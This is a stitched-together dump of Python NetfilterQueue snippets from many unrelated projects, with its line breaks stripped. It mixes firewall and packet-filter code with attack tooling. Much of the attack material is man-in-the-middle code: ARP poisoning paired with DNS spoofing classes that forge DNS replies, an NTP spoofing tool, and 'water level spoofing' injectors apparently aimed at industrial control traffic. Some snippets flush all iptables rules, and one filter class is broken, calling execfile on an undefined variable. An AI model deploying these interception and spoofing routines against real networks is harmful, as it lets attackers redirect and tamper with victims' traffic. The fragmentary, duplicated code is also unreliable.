class InvalidPacketsFilter(object): def __init__(self): self._nfqueue = NetfilterQueue() def filterPackets(self, packet): #scapy_packet = IP(packet.get_payload()) #print " -------- INIZIO PACCHETTO --------\n\n\n" #print scapy_packet.show() #print "\n\n\n -------- FINE PACCHETTO --------\n\n\n" packet.accept() def monitoredTermination(self, signal_number, interrupted_frame): self._nfqueue.unbind() #system("su daniele -c \"notify-send \\\"Invalid packets filter status changed\\\" \\\"Stopped\\\"\"") exit(0) def start(self): self._nfqueue.bind(2, self.filterPackets) #system("su daniele -c \"notify-send \\\"Invalid packets filter status changed\\\" \\\"Started\\\"\"") signal(SIGTERM, self.monitoredTermination) self._nfqueue.run() def stop(self): self._nfqueue.unbind() #system("su daniele -c \"notify-send \\\"Invalid packets filter status changed\\\" \\\"Stopped\\\"\"") exit(0)
def do_mitm(self): """ Performs the man-in-the-middle attack. This function is blocking. """ try: # Add necessary IP table entries. self.log("Updating IP tables...") system("iptables -A INPUT -d {} -p tcp -j NFQUEUE --queue-num {}". format(self.ip, self.queue_number)) system("iptables -A OUTPUT -s {} -p tcp -j NFQUEUE --queue-num {}". format(self.ip, self.queue_number)) # Bind to filter queue. nfqueue = NetfilterQueue() nfqueue.bind(self.queue_number, self.packet_callback) s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM) try: self.log("Running MITM...") nfqueue.run_socket(s) except KeyboardInterrupt: pass self.log("Closing sockets...") s.close() nfqueue.unbind() finally: # Remove IP table entries. self.log("Restoring IP tables.") system("iptables -D INPUT 1") system("iptables -D OUTPUT 1")
def main(argv): spoofer = NTPSpoof() spoofer.getCommandlineOpts(argv) print "[===>] Using %s interface" % spoofer.interface # trying to resolve gateway mac spoofer.gateway_mac = spoofer.getMac(spoofer.gateway_ip) if spoofer.gateway_mac is None: print "[ERROR] Couldn't receive gateway MAC." sys.exit() else: print "[===>] Gatway: IP=%s | MAC=%s " % (spoofer.gateway_ip, spoofer.gateway_mac) # trying to resolve target mac spoofer.target_mac = spoofer.getMac(spoofer.target_ip) if spoofer.target_mac is None: print "[ERROR] Couldn't receive target MAC." sys.exit() else: print "[===>] Target: IP=%s | MAC=%s " % (spoofer.target_ip, spoofer.target_mac) # start poisoning in different thread poison_thread = threading.Thread(target = spoofer.poisonTarget) poison_thread.start() # put incoming ntp-replies into a queue for manipulation print "[===>] Setting iptables for queuing" os.system('iptables -A FORWARD -j NFQUEUE --queue-num 1') # create netfilterqueue interface and bind to nfqueue #1 nfqueue = NetfilterQueue() nfqueue.bind(1,spoofer.callback) try: # run queue nfqueue.run() except KeyboardInterrupt: # unbind nfqueue and reset iptables print "[===>] Resetting iptables" nfqueue.unbind() os.system('iptables -F') finally: # stop poisoning and wait for thread POISON = False time.sleep(2) # restore after poisoning print "[===>] Restoring targets ARP-Cache" spoofer.restoreTarget() sys.exit()
def main(): global quitting setup(NUM_SLOTS) logging.getLogger("scapy.runtime").setLevel(logging.ERROR) timeout_thread = threading.Thread(target=timeout_thread_runner) timeout_thread.daemon = True timeout_thread.start() honeypot_thread = threading.Thread(target=honeypot_thread_runner) honeypot_thread.daemon = True honeypot_thread.start() nfqueue = NetfilterQueue() nfqueue.bind(1, on_packet_received) s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM) try: nfqueue.run_socket(s) except KeyboardInterrupt: print('') quitting = True s.close() nfqueue.unbind()
def main(argv): if len(argv) < 3: print('netfilter.py queuenum host port') exit(s) qnum = int(argv[0]) host = argv[1] port = int(argv[2]) try: print host print port s.settimeout(40) s.connect((host, port)) print('NAT Server found') except Exception as e: print("No NAT found") exit(s) nfqueue = NetfilterQueue() nfqueue.bind(qnum, handle_packet) FORMAT = '%(asctime)-15s %(message)s' logging.basicConfig(filename='filtertimes.log', level=logging.DEBUG, format=FORMAT) logging.info("NEW TRIAL") try: print 'RUNNING QUEUE' nfqueue.run() except KeyboardInterrupt: print 'Stopped' nfqueue.unbind() exit(s)
def run(): if importerror == True: printError("Netfilterqueue is not imported!") print("Traceback:\n" + str(error)) return controller.reset() printInfo("Loading host list...") try: hostfile = open(getpath.conf() + "hosts", "r").read() except FileNotFoundError: printError("Host list is not found!") return except PermissionError: printError("Permission denied!") for line in hostfile.splitlines(): if "#" not in line and len(line.split()) == 2: hostlist.append(line.split()) for item in hostlist: try: item[0] = item[0].encode() except AttributeError: pass try: item[1] = item[1].encode() except AttributeError: pass if variables["arp_spoof"][0] == "true": printInfo("IPv4 forwarding...") os.system('echo "1" >> /proc/sys/net/ipv4/ip_forward') printInfo("Starting ARP spoof...") arpspoof = ArpSpoofer(variables["router"][0], variables["target"][0], controller) arpspoof.start() printInform("Ctrl-C to stop.") os.system( 'iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1' ) try: q = NetfilterQueue() q.bind(1, callback) try: q.run() except KeyboardInterrupt: controller.kill = True q.unbind() os.system('iptables -F') os.system('iptables -X') printInform("DNS spoof stopped.") except: printError("Unexcepted error:\n") traceback.print_exc(file=sys.stdout) controller.kill = True if variables["arp_spoof"][0] == "true": printInfo("Stopping ARP spoof...") arpspoof.join()
class PacketFilter: def __init__(self, filter): self.filter = filter def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(0, self.modify) self.nfqueue.run() def modify(self, pkt): #log.debug("Got packet") data = pkt.get_payload() packet = IP(data) for filter in self.filter: try: execfile(i) except Exception: log.debug("Error occurred in filter", filter) print_exc() pkt.set_payload(str(packet)) #set the packet content to our modified version pkt.accept() #accept the packet def stop(self): self.nfqueue.unbind() set_ip_forwarding(0) iptables().flush()
def startIntercept(): rules() nfqueue = NetfilterQueue() # Bind it to queue number 2 nfqueue.bind(2, handle_packet) s = socket.fromfd(nfqueue.get_fd(), socket.AF_INET, socket.SOCK_STREAM) try: # Start nfqueue nfqueue.run_socket(s) except KeyboardInterrupt: flush_tables() nfqueue.unbind() destroyTap() gc.TCPDUMP.terminate() gc.LOG_DEBUG.debug("Exiting Program (Keyboard Interrupt)") gc.LOG_DEBUG.debug('#' * 50) sys.exit() except SystemError: gc.LOG_DEBUG.debug("Failed to Start NFQueue (System Error)") flush_tables() nfqueue.unbind() destroyTap() sys.exit() except: gc.LOG_DEBUG.debug( "Failed to Start NFQueue (Unknown Error Encountered)") sys.exit()
class PacketFilter: def __init__(self, filter): self.filter = filter def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(0, self.modify) self.nfqueue.run() def modify(self, pkt): #log.debug("Got packet") data = pkt.get_payload() packet = IP(data) for filter in self.filter: try: execfile(i) except Exception: log.debug("Error occurred in filter", filter) print_exc() pkt.set_payload( str(packet)) #set the packet content to our modified version pkt.accept() #accept the packet def stop(self): self.nfqueue.unbind() set_ip_forwarding(0) iptables().flush()
def main(queue_num): open("database.json", 'a', os.O_NONBLOCK) open("log.txt", 'a', os.O_NONBLOCK) if os.stat("database.json").st_size == 0: open("database.json", "w").write("{}") global database_filename, total_packets, packet_accepted database_filename = "database.json" total_packets = 0 packet_accepted = 0 #making queue and assigning callback nfqueue = NetfilterQueue(max_len=10000) nfqueue.bind(queue_num, cb) print("Started Firewall .... ") #calling on each packet arrival try: nfqueue.run() except KeyboardInterrupt: print ("Keyboard Interrupt") #ending of program nfqueue.unbind() print("Queue Closed\n") print( "STATISTICS\n\tTotal Packets :: {}\n\tPackets Accepted :: {}\n\tPackets Dropped :: {}" .format(total_packets, packet_accepted, total_packets - packet_accepted))
def start_server_com(): server = NetfilterQueue() server.bind(1, server_stream) try: server.run() except KeyboardInterrupt: server.unbind()
class PacketFilter: def __init__(self, filter): self.filter = filter def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.modify) t = threading.Thread(name='packetparser', target=self.nfqueue.run) t.setDaemon(True) t.start() def modify(self, pkt): #log.debug("Got packet") data = pkt.get_payload() packet = IP(data) try: execfile(self.filter) except Exception: log.debug("Error occurred in filter") print_exc() pkt.set_payload( str(packet)) #set the packet content to our modified version pkt.accept() #accept the packet def stop(self): self.nfqueue.unbind() set_ip_forwarding(0) iptables().flush()
class PacketFilter: def __init__(self, filter): self.filter = filter def start(self): set_ip_forwarding(1) iptables().NFQUEUE() self.nfqueue = NetfilterQueue() self.nfqueue.bind(1, self.modify) t = threading.Thread(name='packetparser', target=self.nfqueue.run) t.setDaemon(True) t.start() def modify(self, pkt): #log.debug("Got packet") data = pkt.get_payload() packet = IP(data) try: execfile(self.filter) except Exception: log.debug("Error occurred in filter") print_exc() pkt.set_payload(str(packet)) #set the packet content to our modified version pkt.accept() #accept the packet def stop(self): self.nfqueue.unbind() set_ip_forwarding(0) iptables().flush()
def run(self): self.args() self.log('Starting') ######### MAIN CODE ########### # Iptables rule for NTP packets os.system( 'iptables -t raw -A PREROUTING -p udp --sport 123 -j NFQUEUE --queue-num 20' ) # Filter packets nfqueue = NetfilterQueue() #20 is the iptables rule queue number nfqueue.bind(20, self.manipulate) try: self.log("[!] Waiting for NTP packages to spoof (Year = " + str(self.year) + " )") nfqueue.run() except Exception as e: self.log("[!] [FAIL] Failed to start NetFilterQueue : " + e) sys.exit(1) finally: nfqueue.unbind() #p.terminate() os.system('iptables -F -vt raw') ############################### self.finish(True)
def main(): try: iptables_cmd = 'iptables -t raw -A PREROUTING -p tcp --dport ' + args.port + ' -j NFQUEUE --queue-num 1' cmd = os.system(iptables_cmd) print("[+] Setting IpTables rules") if cmd != 0: print("[-] setting iptables failed, exiting!") quit() #create NetfilterQueue object nfqueue = NetfilterQueue() nfqueue.bind(1, callback) print("[+] Waiting for data...") print("[+] Accepting only from", args.source, "port", args.port) nfqueue.run() except KeyboardInterrupt: print("[+] Restoring iptables") #restore iptables os.system("iptables -F -t raw") print('[+] Exiting') nfqueue.unbind()
def initialize(self, result): if platform.system() == "Darwin": pass else: os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1') global domain global localIP localIP = self.config["poisoned_ip"] domain = self.config["domain"] self.running = True if platform.system() == "Darwin": thread = threading.Thread(target=self.dns_sniffer) thread.start() thread.join() else: global queue from netfilterqueue import NetfilterQueue queue = NetfilterQueue() queue.bind(1, self.callback) try: queue.run() # Main loop except KeyboardInterrupt: queue.unbind() # os.system('iptables -F') # os.system('iptables -X') return
def main(argv) : global logger filename = os.path.join( BASEDIR, TARGET_FILE ) load_blacklist(filename) print( '#### START ####' ) sys.stdout.flush() setup() logger = Logger("/var/log/pfloyd.log", False) event_handler = ChangeHandler() observer = Observer() observer.schedule(event_handler,BASEDIR,recursive=True) observer.start() nfqueue = NetfilterQueue() nfqueue.bind(1, netblocker) try: nfqueue.run() except KeyboardInterrupt: observer.stop() print('') nfqueue.unbind() observer.join()
class DNSspoof(object): name = "DNS spoofing" desc = "Filter DNS packets while in man-in-the-middle and modify packet." version = "0.3" def __init__(self,fake): self.fake = fake def callback(self, packet): payload = packet.get_payload() pkt = IP(payload) if not pkt.haslayer(DNSQR): packet.accept() else: if self.inject != None: new_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\ an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=self.fake)) packet.set_payload(str(new_pkt)) packet.accept() elif self.domain in pkt[DNS].qd.qname: new_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\ an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=self.fake)) packet.set_payload(str(new_pkt)) packet.accept() else: packet.accept() self.currentdomain = str(pkt[DNS].qd.qname) def spoof(self): try: self.q = NetfilterQueue() self.q.bind(1, self.callback) self.q.run() except Exception as e: print "[*] Exception caught: {}".format(e) def stop(self): self.q.unbind() os.system('iptables -t nat -D PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1') def getdomain(self): return self.currentdomain def start(self,domain,inject): os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1') self.domain = domain self.inject = inject t = threading.Thread(name='DNSspoof', target=self.spoof) t.setDaemon(True) t.start()
def start_netfilter(self): packets_queue = NetfilterQueue() packets_queue.bind(1, self.packet_callback) try: packets_queue.run() except KeyboardInterrupt: print('') packets_queue.unbind()
def main(): nfqueue = NetfilterQueue() nfqueue.bind(int(sys.argv[1]), process) try: nfqueue.run() except KeyboardInterrupt: print('') nfqueue.unbind()
def main(): nfqueue = NetfilterQueue() nfqueue.bind(1, dns_nat_arbiter) try: nfqueue.run() except KeyboardInterrupt: print('') nfqueue.unbind()
def run(): if importerror == True: printError("netfilterqueue isn't imported") printInfo("install the dependencies and reload this module") print("traceback:\n"+str(error)) return controller.reset() printInfo("loading host list...") try: hostfile = open(getpath.conf()+"hosts", "r").read() except FileNotFoundError: printError("host list not found") return except PermissionError: printError("permission denied") for line in hostfile.splitlines(): if "#" not in line and len(line.split()) == 2: hostlist.append(line.split()) for item in hostlist: try: item[0] = item[0].encode() except AttributeError: pass try: item[1] = item[1].encode() except AttributeError: pass if variables["arp_spoof"][0] == "true": printInfo("ipv4 forwarding...") os.system('echo "1" >> /proc/sys/net/ipv4/ip_forward') printInfo("starting arp spoof...") arpspoof = ArpSpoofer(variables["router"][0], variables["target"][0], controller) arpspoof.start() printInfo("ctrl + c to end") os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1') try: q = NetfilterQueue() q.bind(1, callback) try: q.run() except KeyboardInterrupt: controller.kill = True q.unbind() os.system('iptables -F') os.system('iptables -X') printInfo("dns spoof ended") except: printError("unexcepted error:\n") traceback.print_exc(file=sys.stdout) controller.kill = True if variables["arp_spoof"][0] == "true": printInfo("stopping arp spoof") arpspoof.join()
def main(argv): spoofer = NTPSpoof() spoofer.getCommandlineOpts(argv) print "[===>] Using %s interface" % spoofer.interface # trying to resolve gateway mac spoofer.gateway_mac = spoofer.getMac(spoofer.gateway_ip) if spoofer.gateway_mac is None: print "[ERROR] Couldn't receive gateway MAC." sys.exit() else: print "[===>] Gatway: IP=%s | MAC=%s " % (spoofer.gateway_ip, spoofer.gateway_mac) # trying to resolve target mac spoofer.target_mac = spoofer.getMac(spoofer.target_ip) if spoofer.target_mac is None: print "[ERROR] Couldn't receive target MAC." sys.exit() else: print "[===>] Target: IP=%s | MAC=%s " % (spoofer.target_ip, spoofer.target_mac) # start poisoning in different thread poison_thread = threading.Thread(target=spoofer.poisonTarget) poison_thread.start() # put incoming ntp-replies into a queue for manipulation print "[===>] Setting iptables for queuing" os.system('iptables -A FORWARD -j NFQUEUE --queue-num 1') # create netfilterqueue interface and bind to nfqueue #1 nfqueue = NetfilterQueue() nfqueue.bind(1, spoofer.callback) try: # run queue nfqueue.run() except KeyboardInterrupt: # unbind nfqueue and reset iptables print "[===>] Resetting iptables" nfqueue.unbind() os.system('iptables -F') finally: # stop poisoning and wait for thread POISON = False time.sleep(2) # restore after poisoning print "[===>] Restoring targets ARP-Cache" spoofer.restoreTarget() sys.exit()
def intercepter(stop): if not stop(): print "[*] Starting intercepter..." Queue_num = 0 queue = NetfilterQueue() queue.bind(Queue_num, modify_dns) queue.run() else: queue.unbind()
def run(self): nfqueue = NetfilterQueue() nfqueue.bind(0, self.packet_decider) try: nfqueue.run() except KeyboardInterrupt: logging.info("[FW][Info] Finishing nfqueue") nfqueue.unbind() self.close()
def run(self): os.system("iptables-restore < /etc/iptables/intall") nfqueue = NetfilterQueue() nfqueue.bind(1, self.callback) try: nfqueue.run() except KeyboardInterrupt: nfqueue.unbind() os.system("iptables-restore < /etc/iptables/clean")
def main(): q = NetfilterQueue() q.bind(1, callback) try: q.run() # Main loop except KeyboardInterrupt: q.unbind() os.system('iptables -F') os.system('iptables -X')
def FWsubprocess(): ''' Almost dummy subprocess for the firewall binding ''' try: nfqueue = NetfilterQueue() nfqueue.bind(0, print_and_accept) nfqueue.run() except KeyboardInterrupt: nfqueue.unbind()
def main(): parse_arg_and_patterns() nfqueue = NetfilterQueue() nfqueue.bind(1, pkt_check) try: nfqueue.run() except KeyboardInterrupt: print finally: nfqueue.unbind()
def main(): nfqueue = NetfilterQueue() nfqueue.bind(0, callback) try: nfqueue.run() except KeyboardInterrupt: nfqueue.unbind() os.system('iptables -F') os.system('iptables -X') sys.exit('losing...')
def launch_nfqueue(num): nfqueue = NetfilterQueue() nfqueue.bind(num, callback) sleep(1) while lock([])[0] is False: print '#'*10 + '-'*10 + '> Bound to queue %s <'%num + '-'*10 +'#'*10 nfqueue.run() print '#'*10 + '-'*10 + '> Queue %s had to restart <'%num + '-'*10 + '#'*10 print '#'*10 + '-'*10 + '> Queue %s got SIGSTOP <'%num + '-'*10 + '#'*10 nfqueue.unbind()
def main(): queue = NFQ() try: os.system("iptables -I FORWARD -j NFQUEUE --queue-num 10") # bind trebuie să folosească aceiași coadă ca cea definită în iptables queue.bind(10, detect_and_alter_packet) queue.run() except KeyboardInterrupt: os.system("iptables --flush") queue.unbind()
def main(): nfqueue = NetfilterQueue() nfqueue.bind(1, print_and_accept) s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM) try: nfqueue.run_socket(s) except: print('') s.close() nfqueue.unbind()
def main(): print "starting script...." initial_configure() nfqueue = NetfilterQueue() nfqueue.bind(1, test_packet_process) try: nfqueue.run() except KeyboardInterrupt: print('') nfqueue.unbind()
def start(): __setup() nfqueue = NetfilterQueue() nfqueue.bind(0, __inject) try: print("[*] starting water flow spoofing") nfqueue.run() except KeyboardInterrupt: __setdown() print("[*] stopping water flow spoofing") nfqueue.unbind()
def main(): q = NetfilterQueue() q.bind(1, callback) s = socket.fromfd(q.get_fd(), socket.AF_INET, socket.SOCK_STREAM) try: q.run_socket(s) except KeyboardInterrupt: q.unbind() print("flushing tables") os.system('iptables -F') os.system('iptables -X')
def start(self): sys.stdout.write('Listening on NFQUEUE %s... \n' % str(QUEUE_NUM)) nfqueue = NetfilterQueue() nfqueue.bind(QUEUE_NUM, self._packet_callback) s = socket.fromfd(nfqueue.get_fd(), socket.AF_UNIX, socket.SOCK_STREAM) try: nfqueue.run_socket(s) except KeyboardInterrupt: sys.stdout.write('Exiting \n') s.close() nfqueue.unbind()
def subproc_clb(queue_num): nfqueue = NetfilterQueue() try: nfqueue.bind(queue_num, nfqueue_clb) nfqueue.run() except KeyboardInterrupt: print('Terminating Queue ' + str(queue_num)) finally: nfqueue.unbind() pass pass
def run(self): # This is the intercept q = NetfilterQueue() q.bind(1, self.callback) t = threading.Thread(target=self.__run_threaded, args=(q,)) t.daemon = True t.start() while not self.event.is_set(): self.configurator() print("DNSspoofer finishing!") q.unbind()
def main(): q = NetfilterQueue() q.bind(1,process) try: print "Binding" #q.try_run() q.run() except KeyboardInterrupt: print "Exiting..." q.unbind() sys.exit(1)
def packet_filter(): nfq = NetfilterQueue() nfq.bind(1, pkt_filter_callback) try: print 'Controller packet filtering mode' nfq.run() except KeyboardInterrupt: print 'Quitting packet filter' nfq.unbind() raise KeyboardInterrupt
def start(): __setup() nfqueue = NetfilterQueue() nfqueue.bind(0, __inject) try: print("[*] starting water level spoofing") nfqueue.run() except KeyboardInterrupt: __setdown() thread.stop() thread.join() nfqueue.unbind() print("[*] stopping water level spoofing") return 0
def start(): __setup() nfqueue = NetfilterQueue() nfqueue.bind(0, __inject) try: print(datetime.datetime.now()) print("[*] starting multipoint attack") nfqueue.run() except KeyboardInterrupt: __setdown() print("[*] stopping multipoint attack") print(datetime.datetime.now()) nfqueue.unbind() return 1
class NFQueue(multiprocessing.Process): _nfqueue = None _queues = [] def __init__(self, queues): multiprocessing.Process.__init__(self) self._queues = queues self._nfqueue = NetfilterQueue() def handle_pkt(self, queue, pkt): logger.debug('Queue %s pkt len %s content %s' % (queue, pkt.get_payload_len(), pkt)) print('Queue %s pkt len %s content %s' % (queue, pkt.get_payload_len(), pkt)) o_pkt = IP(pkt.get_payload()) m = MPLS(label=0x9, cos = 0x3) #new_pkt = Ether(type=0x8847)/m/o_pkt new_pkt = Ether()/o_pkt #new_pkt = o_pkt/Raw('FFFFFF'+ pkt.get_payload()) send(new_pkt) new_pkt.show() pkt.drop() # pkt.accept() def run(self): for i in self._queues: self._nfqueue.bind(i, curry(self.handle_pkt, i)) logger.info("Bind queue %s" % i) try: self._nfqueue.run() except ValueError: logger.debug("STOPPPED due to invalid configuration ") self.cleanup() except KeyboardInterrupt: logger.debug("STOPPPED due to user keyboard input ") self.cleanup() except: logger.debug("STOPPPED due to user keyboard input ") self.cleanup() def cleanup(self): logger.debug("packet handler cleaning up ") self._nfqueue.unbind() def stop(self): logger.debug("packet handler stopped ") self.cleanup()
def start(): __setup() nfqueue = NetfilterQueue() nfqueue.bind(0, __inject) thread = RepeatEvery(1, update_attack_level) try: print("[*] starting water level spoofing") thread.start() nfqueue.run() except KeyboardInterrupt: __setdown() thread.stop() thread.join() nfqueue.unbind() print("[*] stopping water level spoofing")
def selective_forward_func(): selective_filter_path = os.path.join(os.getcwd(), 'connect_module', 'AP_module', SELECTIVE_FILTER_PATH_NAME) proto_setting_fp = open(os.path.join(selective_filter_path, 'setting_protocol.csv')) addr_setting_fp = open(os.path.join(selective_filter_path, 'setting_address.csv')) proto_lines = proto_setting_fp.readlines() addr_lines = addr_setting_fp.readlines() for line in proto_lines: proto, action = line.replace('\n', '').split(',') proto_filter[int(proto)] = action for line in addr_lines: target, addr, port, action = line.replace('\n', '').split(',') try: if target == 'src': src_addr_filter[addr] = (int(port), action) elif target == 'dst': dst_addr_filter[addr] = (int(port), action) except ValueError: if target == 'src': src_addr_filter[addr] = (port, action) elif target == 'dst': dst_addr_filter[addr] = (port, action) ''' q = nfqueue.queue() q.open() q.bind(socket.AF_INET) q.set_callback(pkt_modify) q.create_queue(1) ''' nfq = NetfilterQueue() nfq.bind(1, pkt_filter_callback) try: print 'Starting to filtering packets' nfq.run() except KeyboardInterrupt: print 'Quitting selective mode' nfq.unbind()
class DNSspoof(object): def __init__(self,domain,fake): self.domain = domain self.fake = fake os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1') def callback(self, packet): payload = packet.get_payload() pkt = IP(payload) if not pkt.haslayer(DNSQR): packet.accept() else: if self.domain in pkt[DNS].qd.qname: new_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\ an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=self.fake)) packet.set_payload(str(new_pkt)) packet.accept() else: packet.accept() def start(self): try: self.q = NetfilterQueue() self.q.bind(1, self.callback) self.q.run() except Exception as e: print "[*] Exception caught: {}".format(e) def stop(self): self.q.unbind() os.system('iptables -t nat -D PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1') sys.exit(0) def main(self): t = threading.Thread(name='DNSspoof', target=self.start) t.setDaemon(True) t.start()
def main(): # Root check if(os.getuid() != 0): exit("This program must be run with root/sudo") # Initialize new process for ARP poisoning arp_poison = Process(target=ArpPoison, args=(args.ip, args.router, args.iface)) arp_poison.start() # Create iptables rule to forward prerouting to NFQUEUE os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE --queue-num 1') # Initialize nfqueue and bind to parse function nfqueue = NetfilterQueue() nfqueue.bind(1, parse) # Main loop try: nfqueue.run() except KeyboardInterrupt: print("Interrupt Signal received, shutting down...") nfqueue.unbind() arp_poison.join() os.system('iptables -t nat -F')
class _DNS(): def __init__(self, queue_number): self.hsts = False self.dns = False self.dnscfg = None self.hstscfg = None self.queue_number = queue_number self.nfqueue = NetfilterQueue() def start(self): t = threading.Thread(name='dns_nfqueue', target=self.nfqueue_bind, args=()) t.setDaemon(True) t.start() def nfqueue_bind(self): self.nfqueue.bind(self.queue_number, self.nfqueue_callback) self.nfqueue.run() def stop(self): try: self.nfqueue.unbind() except: pass def resolve_domain(self, domain): try: logging.debug("Resolving -> %s" % domain) answer = dns.resolver.query(domain, 'A') real_ips = [] for rdata in answer: real_ips.append(rdata.address) if len(real_ips) > 0: return real_ips except Exception: logging.info("Error resolving " + domain) def nfqueue_callback(self, payload): try: #logging.debug(payload) pkt = IP(payload.get_payload()) if not pkt.haslayer(DNSQR): payload.accept() if pkt.haslayer(DNSQR): logging.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype)) if self.dns: for k, v in self.dnscfg.items(): if k in pkt[DNSQR].qname: self.modify_dns(payload, pkt, v) return payload.accept() elif self.hsts: if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1): for k,v in self.hstscfg.items(): if v == pkt[DNSQR].qname[:-1]: ip = self.resolve_domain(k) if ip: self.modify_dns(payload, pkt, ip) return if 'wwww' in pkt[DNSQR].qname: ip = self.resolve_domain(pkt[DNSQR].qname[1:-1]) if ip: self.modify_dns(payload, pkt, ip) return if 'web' in pkt[DNSQR].qname: ip = self.resolve_domain(pkt[DNSQR].qname[3:-1]) if ip: self.modify_dns(payload, pkt, ip) return payload.accept() except Exception, e: print "Exception occurred in nfqueue callback: " + str(e)
#!/usr/bin/env python from netfilterqueue import NetfilterQueue def print_and_accept(pkt): print(pkt) pkt.accept() nfqueue = NetfilterQueue() nfqueue.bind(1, print_and_accept) try: nfqueue.run() except KeyboardInterrupt: print('') nfqueue.unbind()